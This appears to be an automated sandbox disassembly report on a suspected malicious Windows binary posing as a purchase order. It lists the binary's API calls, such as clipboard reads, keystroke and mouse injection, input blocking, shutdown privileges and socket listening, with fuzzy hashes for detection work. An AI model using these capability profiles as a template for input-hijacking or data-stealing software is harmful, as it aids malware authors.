                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                            • __swprintf.LIBCMT ref: 00431C2E
                                                            • _wcslen.LIBCMT ref: 00431C3A
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                            Similarity
                                                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2192556992-3457252023
                                                            • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                            • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                            • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                            • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                            • __swprintf.LIBCMT ref: 004722B9
                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                            Similarity
                                                            • API ID: FolderPath$LocalTime__swprintf
                                                            • String ID: %.3d
                                                            • API String ID: 3337348382-986655627
                                                            • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                            • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                            • FindClose.KERNEL32(00000000), ref: 0044291C
                                                            • FindClose.KERNEL32(00000000), ref: 00442930
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                            • FindClose.KERNEL32(00000000), ref: 004429D4
                                                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                            • FindClose.KERNEL32(00000000), ref: 004429E2
                                                            Similarity
                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 2640511053-438819550
                                                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                            • GetLastError.KERNEL32 ref: 00433414
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                            Similarity
                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 2938487562-3733053543
                                                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                            APIs
                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                            • CopySid.ADVAPI32(00000000), ref: 00446271
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                            • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                            • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                            • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 00433073
                                                            • __swprintf.LIBCMT ref: 00433085
                                                            • __wcsicoll.LIBCMT ref: 00433092
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                            • LockResource.KERNEL32(00000000), ref: 004330CA
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                            • LockResource.KERNEL32(?), ref: 00433120
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                            • String ID:
                                                            • API String ID: 1158019794-0
                                                            • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                            • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                            • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                            • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                            • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                            • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                            • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                            • GetLastError.KERNEL32 ref: 0045D6BF
                                                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                            Similarity
                                                            • API ID: _memmove$_strncmp
                                                            • String ID: @oH$\$^$h
                                                            • API String ID: 2175499884-3701065813
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                            • API String ID: 0-2872873767
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                            • __wsplitpath.LIBCMT ref: 00475644
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcscat.LIBCMT ref: 00475657
                                                            • __wcsicoll.LIBCMT ref: 0047567B
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                            • String ID:
                                                            • API String ID: 2547909840-0
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                            • FindClose.KERNEL32(?), ref: 004525FF
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                            • String ID: *.*$\VH
                                                            • API String ID: 2786137511-2657498754
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID: pqI
                                                            • API String ID: 2579439406-2459173057
                                                            APIs
                                                            • __wcsicoll.LIBCMT ref: 00433349
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                            • __wcsicoll.LIBCMT ref: 00433375
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                            Similarity
                                                            • API ID: __wcsicollmouse_event
                                                            • String ID: DOWN
                                                            • API String ID: 1033544147-711622031
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                            Similarity
                                                            • API ID: KeyboardMessagePostState$InputSend
                                                            • String ID:
                                                            • API String ID: 3031425849-0
                                                            APIs
                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            APIs
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • IsWindowVisible.USER32 ref: 0047A368
                                                            • IsWindowEnabled.USER32 ref: 0047A378
                                                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                            • IsIconic.USER32 ref: 0047A393
                                                            • IsZoomed.USER32 ref: 0047A3A1
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 00478442
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                            • CoUninitialize.OLE32 ref: 0047863C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                            • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                            APIs
                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                            • String ID:
                                                            • API String ID: 15083398-0
                                                            • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                            • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                            • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                            • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: U$\
                                                            • API String ID: 4104443479-100911408
                                                            • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                            • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                            • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                            • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                            • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                            • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                            • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                            • FindClose.KERNEL32(00000000), ref: 004339EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                            • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                            • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                            • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                            • String ID:
                                                            • API String ID: 901099227-0
                                                            • Opcode ID: 1d0ebaafe3aed14c1a54a83829ac0275269f0a6eaf776995207d6a59000f75fb
                                                            • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                            • Opcode Fuzzy Hash: 1d0ebaafe3aed14c1a54a83829ac0275269f0a6eaf776995207d6a59000f75fb
                                                            • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                            APIs
                                                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Proc
                                                            • String ID:
                                                            • API String ID: 2346855178-0
                                                            • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                            • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                            • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                            • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 0045A38B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                            • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                            • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                            • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                            • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                            • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                            • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                            • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                            • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                            • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: N@
                                                            • API String ID: 0-1509896676
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
